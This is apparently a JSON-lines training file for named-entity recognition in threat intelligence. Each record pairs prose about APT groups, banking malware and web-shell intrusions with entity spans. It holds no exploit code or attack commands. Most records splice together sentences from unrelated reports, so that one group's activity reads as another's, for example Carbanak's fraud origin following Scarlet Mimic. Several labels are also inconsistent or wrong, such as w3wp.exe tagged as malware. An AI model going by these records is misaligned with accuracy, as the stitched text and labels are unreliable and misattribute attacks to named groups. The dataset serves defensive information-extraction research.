Per the complaint , the email account watsonhenny@gmail.com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 .", "spans": [{"start": 20, "end": 33, "label": "Organization"}, {"start": 242, "end": 263, "label": "Indicator"}, {"start": 305, "end": 314, "label": "Organization"}, {"start": 343, "end": 348, "label": "Organization"}]} {"text": "This group has been conducting attacks for at least four years using a backdoor Trojan that has been under active development . The APT38 uses DYEPACK to manipulate the SWIFT transaction records and hide evidence of the malicious transactions , so bank personnel are none the wiser when they review recent transactions .", "spans": [{"start": 5, "end": 10, "label": "Organization"}, {"start": 71, "end": 86, "label": "System"}, {"start": 132, "end": 137, "label": "Organization"}, {"start": 143, "end": 150, "label": "Malware"}, {"start": 248, "end": 262, "label": "Organization"}]} {"text": "Based on analysis of the data and malware samples we have collected , Unit 42 believes the attacks described herein are the work of a group or set of cooperating groups who have a single mission , collecting information on minority groups who reside in and around northwestern China . 
APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns .", "spans": [{"start": 70, "end": 77, "label": "Organization"}, {"start": 134, "end": 139, "label": "Organization"}, {"start": 162, "end": 168, "label": "Organization"}, {"start": 223, "end": 238, "label": "Organization"}, {"start": 285, "end": 290, "label": "Organization"}, {"start": 307, "end": 347, "label": "Organization"}, {"start": 434, "end": 454, "label": "Organization"}]} {"text": "Attacks launched by this group were publicly exposed on 2013 in a Trend Micro report about the FakeM Trojan . Other groups attributed to Iranian attackers , such as Rocket Kitten , have targeted Iranian individuals in the past , including anonymous proxy users , researchers , journalists , and dissidents .", "spans": [{"start": 25, "end": 30, "label": "Organization"}, {"start": 66, "end": 77, "label": "Organization"}, {"start": 95, "end": 107, "label": "System"}, {"start": 116, "end": 122, "label": "Organization"}, {"start": 145, "end": 154, "label": "Organization"}, {"start": 165, "end": 178, "label": "Organization"}, {"start": 239, "end": 260, "label": "Organization"}, {"start": 263, "end": 274, "label": "Organization"}, {"start": 277, "end": 288, "label": "Organization"}, {"start": 295, "end": 305, "label": "Organization"}]} {"text": "We will also provide detailed analysis of the latest variants of the malware they deploy ( known as FakeM ) as well as other associated tools that allow Scarlet Mimic to target Android and OS X devices . 
We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": [{"start": 100, "end": 105, "label": "System"}, {"start": 153, "end": 166, "label": "Organization"}, {"start": 224, "end": 232, "label": "Malware"}, {"start": 299, "end": 308, "label": "Organization"}, {"start": 349, "end": 367, "label": "Organization"}, {"start": 391, "end": 400, "label": "Organization"}]} {"text": "In the past , Scarlet Mimic has primarily targeted individuals who belong to these minority groups as well as their supporters , but we've recently found evidence to indicate the group also targets individuals working inside government anti-terrorist organizations . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": [{"start": 14, "end": 27, "label": "Organization"}, {"start": 83, "end": 98, "label": "Organization"}, {"start": 116, "end": 126, "label": "Organization"}, {"start": 179, "end": 184, "label": "Organization"}, {"start": 236, "end": 264, "label": "Organization"}, {"start": 267, "end": 275, "label": "Malware"}, {"start": 343, "end": 351, "label": "Organization"}, {"start": 443, "end": 450, "label": "Malware"}]} {"text": "We also know Scarlet Mimic uses a number of toolkits to create documents that contain exploit code to install the FakeM payload on a compromised system . 
The group has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": [{"start": 13, "end": 26, "label": "Organization"}, {"start": 114, "end": 119, "label": "System"}, {"start": 231, "end": 239, "label": "Organization"}, {"start": 331, "end": 338, "label": "Malware"}]} {"text": "Unit 42 tracks the toolkits delivering FakeM under the names MNKit , WingD and Tran Duy Linh . Gallmaker 's targets are embassies of an Eastern European country .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 39, "end": 44, "label": "System"}, {"start": 61, "end": 66, "label": "System"}, {"start": 69, "end": 74, "label": "System"}, {"start": 79, "end": 92, "label": "System"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 120, "end": 129, "label": "Organization"}]} {"text": "In July of 2015 , we identified a full e-mail uploaded to an antivirus scanning service that carried a Scarlet Mimic exploit document . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": [{"start": 103, "end": 124, "label": "Vulnerability"}, {"start": 186, "end": 190, "label": "Organization"}, {"start": 224, "end": 232, "label": "Malware"}, {"start": 262, "end": 271, "label": "Organization"}]} {"text": "We are aware of one case where Scarlet Mimic broke from the spear-phishing pattern described above . 
360 and Tuisec already identified some Gorgon Group members .", "spans": [{"start": 31, "end": 44, "label": "Organization"}, {"start": 101, "end": 104, "label": "Organization"}, {"start": 109, "end": 115, "label": "Organization"}, {"start": 140, "end": 152, "label": "Organization"}, {"start": 153, "end": 160, "label": "Organization"}]} {"text": "In 2013 , the group deployed a watering hole attack , also known as a strategic web compromise to infect victims with their backdoor . Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers .", "spans": [{"start": 14, "end": 19, "label": "Organization"}, {"start": 135, "end": 143, "label": "Organization"}, {"start": 170, "end": 177, "label": "Organization"}, {"start": 215, "end": 224, "label": "Organization"}]} {"text": "FakeM 's functional code is shellcode-based and requires another Trojan to load it into memory and execute it . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations .", "spans": [{"start": 0, "end": 5, "label": "System"}, {"start": 156, "end": 163, "label": "Organization"}, {"start": 184, "end": 190, "label": "System"}, {"start": 241, "end": 254, "label": "Organization"}, {"start": 266, "end": 289, "label": "Organization"}]} {"text": "First discussed in January 2013 in a Trend Micro whitepaper , FakeM is a Trojan that uses separate modules to perform its functionality . 
Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents .", "spans": [{"start": 37, "end": 48, "label": "Organization"}, {"start": 62, "end": 67, "label": "System"}, {"start": 73, "end": 79, "label": "System"}, {"start": 162, "end": 175, "label": "Organization"}, {"start": 225, "end": 231, "label": "System"}, {"start": 246, "end": 260, "label": "Organization"}]} {"text": "We end this section with a discussion on tools related to FakeM and used by Scarlet Mimic . We concluded that Lazarus Group was responsible for WannaCry , a destructive attack in May that targeted Microsoft customers .", "spans": [{"start": 58, "end": 63, "label": "System"}, {"start": 76, "end": 89, "label": "Organization"}, {"start": 110, "end": 123, "label": "Organization"}, {"start": 144, "end": 152, "label": "Malware"}, {"start": 197, "end": 216, "label": "Organization"}]} {"text": "Microsoft patched this vulnerability in September 2012 , suggesting that this watering hole attack used an older vulnerability , which aligns with the threat groups continued use of older vulnerabilities in their spear-phishing efforts . The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 151, "end": 164, "label": "Organization"}, {"start": 260, "end": 270, "label": "Organization"}, {"start": 284, "end": 290, "label": "Organization"}]} {"text": "Microsoft patched this vulnerability in September 2012 , suggesting that this watering hole attack used an older vulnerability , which aligns with Scarlet Mimic continued use of older vulnerabilities in their spear-phishing efforts . 
On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 147, "end": 160, "label": "Organization"}, {"start": 265, "end": 271, "label": "Organization"}, {"start": 306, "end": 316, "label": "Organization"}]} {"text": "Based on the timeline , it appears that the actors were actively developing several of the loaders at the same time from 2009 until the early months of 2014 . On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": [{"start": 44, "end": 50, "label": "Organization"}, {"start": 183, "end": 196, "label": "Organization"}, {"start": 231, "end": 241, "label": "Organization"}]} {"text": "Unit 42 tracks this mobile Trojan as MobileOrder , as the authors specifically refer to commands within the app as orders . APT threat actors , most likely nation state-sponsored , targeted a diplomat in the French Ministry of Foreign Affairs with a seemingly legitimate invitation to a technology conference in Taiwan .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 20, "end": 33, "label": "System"}, {"start": 37, "end": 48, "label": "System"}, {"start": 124, "end": 141, "label": "Organization"}, {"start": 192, "end": 200, "label": "Organization"}]} {"text": "There are also infrastructure ties between some FakeM variants and older activity using Trojans such as Elirks , Poison Ivy , and BiFrost , which were used in attacks as old as 2009 . 
Additionally , the targeting of a French diplomat based in Taipei , Taiwan aligns with previous targeting by these actors , as does the separate infrastructure .", "spans": [{"start": 48, "end": 53, "label": "System"}, {"start": 104, "end": 110, "label": "System"}, {"start": 113, "end": 123, "label": "System"}, {"start": 218, "end": 233, "label": "Organization"}, {"start": 299, "end": 305, "label": "Organization"}]} {"text": "There is some infrastructure overlap in the C2 servers used by almost all of the FakeM variants , as well other Trojans such as MobileOrder , Psylo , and CallMe . Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents .", "spans": [{"start": 81, "end": 86, "label": "System"}, {"start": 128, "end": 139, "label": "System"}, {"start": 142, "end": 147, "label": "System"}, {"start": 154, "end": 160, "label": "System"}, {"start": 185, "end": 190, "label": "Organization"}, {"start": 211, "end": 227, "label": "Organization"}, {"start": 243, "end": 263, "label": "Organization"}, {"start": 294, "end": 313, "label": "Organization"}, {"start": 316, "end": 327, "label": "Organization"}, {"start": 345, "end": 355, "label": "Organization"}]} {"text": "Trend Micro published their analysis of the FakeM Trojan on January 17 , 2013 that discussed the original variant of FakeM . APT35 typically targets U.S. 
and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 44, "end": 56, "label": "System"}, {"start": 117, "end": 122, "label": "System"}, {"start": 125, "end": 130, "label": "Organization"}, {"start": 177, "end": 185, "label": "Organization"}, {"start": 188, "end": 198, "label": "Organization"}, {"start": 203, "end": 223, "label": "Organization"}, {"start": 226, "end": 239, "label": "Organization"}, {"start": 247, "end": 252, "label": "Organization"}, {"start": 255, "end": 261, "label": "Organization"}, {"start": 266, "end": 289, "label": "Organization"}, {"start": 292, "end": 295, "label": "Organization"}, {"start": 304, "end": 315, "label": "Organization"}, {"start": 318, "end": 335, "label": "Organization"}, {"start": 340, "end": 366, "label": "Organization"}]} {"text": "The primary source of data used in this analysis is Palo Alto Networks WildFire , which analyzes malware used in attacks across the world . COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or affiliated with the MENA region , identifying individual victims through social media sites .", "spans": [{"start": 52, "end": 79, "label": "Organization"}, {"start": 140, "end": 152, "label": "Organization"}, {"start": 186, "end": 204, "label": "Organization"}, {"start": 207, "end": 217, "label": "Organization"}, {"start": 220, "end": 227, "label": "Organization"}, {"start": 230, "end": 233, "label": "Organization"}, {"start": 240, "end": 272, "label": "Organization"}, {"start": 331, "end": 349, "label": "Organization"}, {"start": 358, "end": 370, "label": "Organization"}]} {"text": "Scarlet Mimic also uses the infamous HTRAN tool on at least some of their C2 servers . 
The Magic Hound has repeatedly used social media to identify and interact with employees at targeted organizations and then used weaponized Excel documents .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 37, "end": 47, "label": "System"}, {"start": 123, "end": 135, "label": "Organization"}, {"start": 166, "end": 175, "label": "Organization"}]} {"text": "Scarlet Mimic primarily deploys spear-phishing e-mails to infect its targets , but was also responsible for a watering hole attack in 2013 . The May 2014 ' Operation Saffron Rose ' publication identifies an Iranian hacking group formerly named ' Ajax Security ' ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 246, "end": 259, "label": "Organization"}, {"start": 277, "end": 290, "label": "Organization"}, {"start": 296, "end": 307, "label": "Organization"}, {"start": 362, "end": 372, "label": "Organization"}]} {"text": "Kaspersky Lab has produced excellent research on Scarlet Mimic group . An Iranian hacking group formerly named Ajax Security ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 49, "end": 68, "label": "Organization"}, {"start": 111, "end": 124, "label": "Organization"}, {"start": 140, "end": 153, "label": "Organization"}, {"start": 159, "end": 170, "label": "Organization"}, {"start": 225, "end": 235, "label": "Organization"}]} {"text": "Actors will run HTRAN on a server and configure their malware to interact with that server ; however , the actor will configure HTRAN to forward traffic to another server where the actual C2 server exists . 
PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups . Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 16, "end": 21, "label": "System"}, {"start": 107, "end": 112, "label": "Organization"}, {"start": 128, "end": 133, "label": "System"}, {"start": 207, "end": 211, "label": "Malware"}, {"start": 285, "end": 300, "label": "Organization"}, {"start": 303, "end": 322, "label": "Organization"}, {"start": 325, "end": 344, "label": "Organization"}, {"start": 411, "end": 420, "label": "Organization"}, {"start": 428, "end": 436, "label": "Vulnerability"}, {"start": 469, "end": 473, "label": "Malware"}]} {"text": "The information discovered by Unit 42 and shared here indicates Scarlet Mimic is likely a well-funded and skillfully resourced cyber adversary . APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world .", "spans": [{"start": 30, "end": 37, "label": "Organization"}, {"start": 64, "end": 77, "label": "Organization"}, {"start": 145, "end": 150, "label": "Organization"}, {"start": 249, "end": 261, "label": "Malware"}, {"start": 283, "end": 292, "label": "Organization"}]} {"text": "Scarlet Mimic has carried out attacks using both spear-phishing and watering holes since at least 2009 with increasingly advanced malware , and has deployed malware to attack multiple operating systems and platforms . 
Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence industries ; financial institutions ; journalists ; software developers .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 238, "end": 246, "label": "Organization"}, {"start": 255, "end": 267, "label": "Organization"}, {"start": 308, "end": 317, "label": "Organization"}, {"start": 339, "end": 348, "label": "Organization"}, {"start": 353, "end": 371, "label": "Organization"}, {"start": 374, "end": 396, "label": "Organization"}, {"start": 399, "end": 410, "label": "Organization"}, {"start": 413, "end": 432, "label": "Organization"}]} {"text": "This time I'm going to focus on malicious CHM files used by Silence APT . It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data exfiltration from high-profile victim organizations .", "spans": [{"start": 42, "end": 51, "label": "System"}, {"start": 60, "end": 71, "label": "Organization"}, {"start": 130, "end": 139, "label": "Organization"}, {"start": 147, "end": 161, "label": "Malware"}]} {"text": "If you haven't heard about it for some reason , I would recommend reading this detailed report by Group-IB , as this APT attacks not only Russian banks , but also banks in more than 25 countries . 
In early May 2016 , both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe .", "spans": [{"start": 98, "end": 106, "label": "Organization"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 163, "end": 168, "label": "Organization"}, {"start": 222, "end": 232, "label": "Organization"}, {"start": 237, "end": 246, "label": "Organization"}, {"start": 291, "end": 311, "label": "Organization"}]} {"text": "The group primarily deploys spear-phishing e-mails to infect its targets , but was also responsible for a watering hole attack in 2013 . Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 218, "end": 226, "label": "Organization"}, {"start": 253, "end": 268, "label": "Organization"}, {"start": 302, "end": 322, "label": "Organization"}]} {"text": "The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . 
Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 15, "end": 46, "label": "System"}, {"start": 193, "end": 202, "label": "Organization"}, {"start": 251, "end": 254, "label": "System"}, {"start": 387, "end": 390, "label": "Organization"}, {"start": 393, "end": 396, "label": "Organization"}, {"start": 403, "end": 426, "label": "Organization"}, {"start": 456, "end": 466, "label": "Organization"}]} {"text": "On January 12 , 2016 , Cylance published a blog linking an exploit document to the group Mandiant refers to as APT2 and CrowdStrike as \" Putter Panda \" . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": [{"start": 23, "end": 30, "label": "Organization"}, {"start": 89, "end": 97, "label": "Organization"}, {"start": 111, "end": 115, "label": "Organization"}, {"start": 120, "end": 131, "label": "Organization"}, {"start": 137, "end": 149, "label": "Organization"}, {"start": 154, "end": 163, "label": "Organization"}, {"start": 212, "end": 215, "label": "System"}, {"start": 348, "end": 351, "label": "Organization"}, {"start": 354, "end": 357, "label": "Organization"}, {"start": 364, "end": 387, "label": "Organization"}, {"start": 417, "end": 427, "label": "Organization"}]} {"text": "In 2016 , Unit 42 launched an 
unprecedented analytic effort focused on developing a modern assessment of the size , scope and complexity of this threat . Additionally , HELIX KITTEN actors have shown an affinity for creating thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel .", "spans": [{"start": 10, "end": 17, "label": "Organization"}, {"start": 169, "end": 188, "label": "Organization"}, {"start": 324, "end": 333, "label": "Organization"}]} {"text": "In 2014 , Unit 42 released a report titled \" 419 Evolution \" that documented one of the first known cases of Nigerian cybercriminals using malware for financial gain . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": [{"start": 10, "end": 17, "label": "Organization"}, {"start": 118, "end": 132, "label": "Organization"}, {"start": 172, "end": 181, "label": "Organization"}, {"start": 196, "end": 202, "label": "System"}, {"start": 228, "end": 237, "label": "Indicator"}, {"start": 241, "end": 280, "label": "Organization"}]} {"text": "A few months later , in February 2017 , the FBI published a press release revising its estimates and stating that \" Since January 2015 , there has been a 1,300 percent increase in identified exposed losses , now totaling over $3 billion \" Recognizing the significance of this threat group , Unit 42 continues to track the evolution of Nigerian cybercrime under the code name SilverTerrier . 
In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers .", "spans": [{"start": 44, "end": 47, "label": "Organization"}, {"start": 276, "end": 288, "label": "Organization"}, {"start": 291, "end": 298, "label": "Organization"}, {"start": 375, "end": 388, "label": "Organization"}, {"start": 406, "end": 414, "label": "Organization"}, {"start": 517, "end": 526, "label": "Organization"}]} {"text": "In the 2016 Internet Crime Report published by the FBI , BEC was specifically highlighted as a \" Hot Topic \" , having been attributed to more than US$360 million in losses and gaining status as its own category of attack . The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China .", "spans": [{"start": 51, "end": 54, "label": "Organization"}, {"start": 290, "end": 309, "label": "Organization"}, {"start": 314, "end": 335, "label": "Organization"}]} {"text": "Recognizing the significance of this threat group , Unit 42 continues to track the evolution of Nigerian cybercrime under the code name SilverTerrier . It's possible TG-3390 used a waterhole to infect data center employees .", "spans": [{"start": 37, "end": 49, "label": "Organization"}, {"start": 52, "end": 59, "label": "Organization"}, {"start": 136, "end": 149, "label": "Organization"}, {"start": 166, "end": 173, "label": "Organization"}, {"start": 201, "end": 222, "label": "Organization"}]} {"text": "Pony is a fairly common malware family that has existed in various forms since 2012 , with our first indications of Nigerian use occurring in August 2014 . 
The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center .", "spans": [{"start": 0, "end": 4, "label": "System"}, {"start": 262, "end": 272, "label": "Organization"}, {"start": 366, "end": 375, "label": "Organization"}]} {"text": "Of the four , KeyBase stands out due to its rapid rise in popularity , with a peak deployment of 160 samples per month and usage by 46 separate SilverTerrier actors , followed by a fairly rapid decline . The group , believed to be based in China , has also targeted defense contractors , colleges and universities , law firms , and political organizations \u2014 including organizations related to Chinese minority ethnic groups .", "spans": [{"start": 14, "end": 21, "label": "System"}, {"start": 144, "end": 164, "label": "Organization"}, {"start": 266, "end": 285, "label": "Organization"}, {"start": 288, "end": 296, "label": "Organization"}, {"start": 301, "end": 313, "label": "Organization"}, {"start": 316, "end": 325, "label": "Organization"}, {"start": 332, "end": 355, "label": "Organization"}, {"start": 401, "end": 423, "label": "Organization"}]} {"text": "NetWire , DarkComet , NanoCore , LuminosityLink , Remcos and Imminent Monitor are all designed to provide remote access to compromised systems . 
In all cases , based on the nature of the computers infected by Thrip , it appeared that the telecoms companies themselves and not their customers were the targets of these attacks .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 10, "end": 19, "label": "System"}, {"start": 22, "end": 30, "label": "System"}, {"start": 33, "end": 47, "label": "System"}, {"start": 50, "end": 56, "label": "System"}, {"start": 61, "end": 77, "label": "System"}, {"start": 98, "end": 119, "label": "Malware"}, {"start": 238, "end": 256, "label": "Organization"}, {"start": 282, "end": 291, "label": "Organization"}]} {"text": "Unit 42 analyzed the use of these six malware families and found that Nigerian actors are currently producing an average of 146 unique samples of malware per month ( see Figure 6 ) . Turla is a notorious group that has been targeting government officials .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 79, "end": 85, "label": "Organization"}, {"start": 183, "end": 188, "label": "Organization"}, {"start": 234, "end": 254, "label": "Organization"}]} {"text": "Given this requirement , SilverTerrier actors often rely on Dynamic DNS and virtual private servers to provide a layer of obfuscation to protect their identities . Turla is a notorious group that has been targeting diplomats .", "spans": [{"start": 25, "end": 45, "label": "Organization"}, {"start": 60, "end": 71, "label": "System"}, {"start": 76, "end": 99, "label": "System"}, {"start": 164, "end": 169, "label": "Organization"}, {"start": 215, "end": 224, "label": "Organization"}]} {"text": "When using email scams , SilverTerrier actors preferred to use large target audiences , which maximized the likelihood of success with very little risk . 
The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including embassies .", "spans": [{"start": 25, "end": 45, "label": "Organization"}, {"start": 175, "end": 185, "label": "Malware"}, {"start": 264, "end": 273, "label": "Organization"}]} {"text": "Unit 42 tracks roughly 300 SilverTerrier actors who have registered a combined 11,600 domains over the past five years . From February to September 2016 , WhiteBear activity was narrowly focused on embassies and consular operations around the world .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 27, "end": 47, "label": "Organization"}, {"start": 198, "end": 207, "label": "Organization"}]} {"text": "To support the rapid growth and pace of malware distribution efforts , SilverTerrier actors are in constant need of domains to serve as C2 nodes . All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations .", "spans": [{"start": 71, "end": 91, "label": "Organization"}, {"start": 166, "end": 175, "label": "Malware"}, {"start": 200, "end": 209, "label": "Organization"}]} {"text": "To that end , it is very unlikely that the United States government or Shell , a global energy company , would commission SilverTerrier actors to develop domains that impersonate their own legitimate websites and services . 
Thus , Turla operators had access to some highly sensitive information ( such as emails sent by the German Foreign Office staff ) for almost a year .", "spans": [{"start": 57, "end": 67, "label": "Organization"}, {"start": 81, "end": 102, "label": "Organization"}, {"start": 122, "end": 142, "label": "Organization"}, {"start": 231, "end": 236, "label": "Organization"}, {"start": 305, "end": 311, "label": "System"}, {"start": 324, "end": 351, "label": "Organization"}]} {"text": "The credentials they use to register their malware infrastructure are easily associated with their public social media accounts on Google\u00ae , Facebook\u00ae , MySpace\u00ae , Instagram\u00ae , and various dating and blogging sites . We suspect the Kazuar tool may be linked to the Turla threat actor group ( also known as Uroburos and Snake ) , who have been reported to have compromised embassies , defense contractors , educational institutions , and research organizations across the globe .", "spans": [{"start": 106, "end": 118, "label": "Organization"}, {"start": 131, "end": 138, "label": "Organization"}, {"start": 141, "end": 150, "label": "Organization"}, {"start": 153, "end": 161, "label": "Organization"}, {"start": 164, "end": 174, "label": "Organization"}, {"start": 189, "end": 214, "label": "Organization"}, {"start": 232, "end": 243, "label": "Malware"}, {"start": 265, "end": 270, "label": "Organization"}, {"start": 306, "end": 314, "label": "Organization"}, {"start": 319, "end": 324, "label": "Organization"}, {"start": 372, "end": 381, "label": "Organization"}, {"start": 384, "end": 403, "label": "Organization"}, {"start": 406, "end": 430, "label": "Organization"}, {"start": 437, "end": 459, "label": "Organization"}]} {"text": "Earlier this year , Cybereason identified an advanced , persistent attack targeting telecommunications providers that has been underway for years , soon after deploying into the environment . 
Deepen told Threatpost the group has been operating since at least 2008 and has targeted China and US relations experts , Defense Department entities , and geospatial groups within the federal government .", "spans": [{"start": 20, "end": 30, "label": "Organization"}, {"start": 84, "end": 112, "label": "Organization"}, {"start": 192, "end": 198, "label": "Organization"}, {"start": 281, "end": 311, "label": "Organization"}, {"start": 314, "end": 332, "label": "Organization"}, {"start": 348, "end": 365, "label": "Organization"}, {"start": 377, "end": 395, "label": "Organization"}]} {"text": "Based on the data available to us , Operation Soft Cell has been active since at least 2012 , though some evidence suggests even earlier activity by the threat actor against telecommunications providers . Government officials said they knew the initial attack occurred in 2011 , but are unaware of who specifically is behind the attacks .", "spans": [{"start": 153, "end": 165, "label": "Organization"}, {"start": 174, "end": 202, "label": "Organization"}, {"start": 205, "end": 225, "label": "Organization"}]} {"text": "Threat actors , especially those at the level of nation state , are seeking opportunities to attack these organizations , conducting elaborate , advanced operations to gain leverage , seize strategic assets , and collect information . Bahamut was first noticed when it targeted a Middle Eastern human rights activist in the first week of January 2017 .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 280, "end": 316, "label": "Organization"}]} {"text": "The tools and techniques used throughout these attacks are consistent with several Chinese threat actors , such as APT10 , a threat actor believed to operate on behalf of the Chinese Ministry of State Security . 
Later that month , the same tactics and patterns were seen in attempts against an Iranian women 's activist \u2013 an individual commonly targeted by Iranian actors , such as Charming Kitten and the Sima campaign documented in our 2016 Black Hat talk .", "spans": [{"start": 91, "end": 104, "label": "Organization"}, {"start": 115, "end": 120, "label": "Organization"}, {"start": 125, "end": 137, "label": "Organization"}, {"start": 294, "end": 319, "label": "Organization"}, {"start": 325, "end": 335, "label": "Organization"}]} {"text": "The threat actor attempted to compromise critical assets , such as database servers , billing servers , and the active directory . Several times , APT5 has targeted organizations and personnel based in Southeast Asia .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 147, "end": 151, "label": "Organization"}, {"start": 165, "end": 178, "label": "Organization"}, {"start": 183, "end": 192, "label": "Organization"}]} {"text": "The attack began with a web shell running on a vulnerable , publicly-facing server , from which the attackers gathered information about the network and propagated across the network . Given our increased confidence that Bahamut was responsible for targeting of Qatari labor rights advocates and its focus on the foreign policy institutions of other Gulf states , Bahamut 's interests are seemingly too expansive to be limited to one sponsor or customer .", "spans": [{"start": 24, "end": 33, "label": "System"}, {"start": 100, "end": 109, "label": "Organization"}, {"start": 269, "end": 291, "label": "Organization"}, {"start": 313, "end": 340, "label": "Organization"}]} {"text": "The initial indicator of the attack was a malicious web shell that was detected on an IIS server , coming out of the w3wp.exe process . 
Barium specializes in targeting high value organizations holding sensitive data , by gathering extensive information about their employees through publicly available information and social media , using that information to fashion phishing attacks intended to trick those employees into compromising their computers and networks .", "spans": [{"start": 117, "end": 125, "label": "Malware"}, {"start": 136, "end": 142, "label": "Organization"}, {"start": 265, "end": 274, "label": "Organization"}, {"start": 318, "end": 330, "label": "Organization"}, {"start": 408, "end": 417, "label": "Organization"}]} {"text": "An investigation of the web shell , later classified as a modified version of the China Chopper web shell , uncovered several attack phases and TTPs . Barium has targeted Microsoft customers both in Virginia , the United States , and around the world .", "spans": [{"start": 82, "end": 105, "label": "System"}, {"start": 151, "end": 157, "label": "Organization"}, {"start": 171, "end": 190, "label": "Organization"}]} {"text": "The threat actor was able to leverage the web shell to run reconnaissance commands , steal credentials , and deploy other tools . BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 42, "end": 51, "label": "System"}, {"start": 184, "end": 189, "label": "Organization"}]} {"text": "The web shell parameters in this attack match to the China Chopper parameters , as described in FireEye 's analysis of China Chopper . Our research indicates that it has started targeting Japanese users .", "spans": [{"start": 53, "end": 66, "label": "Organization"}, {"start": 96, "end": 103, "label": "Organization"}, {"start": 119, "end": 132, "label": "Organization"}, {"start": 188, "end": 202, "label": "Organization"}]} {"text": "It is used to remotely control web servers , and has been used in many attacks against Australian web hosting providers . 
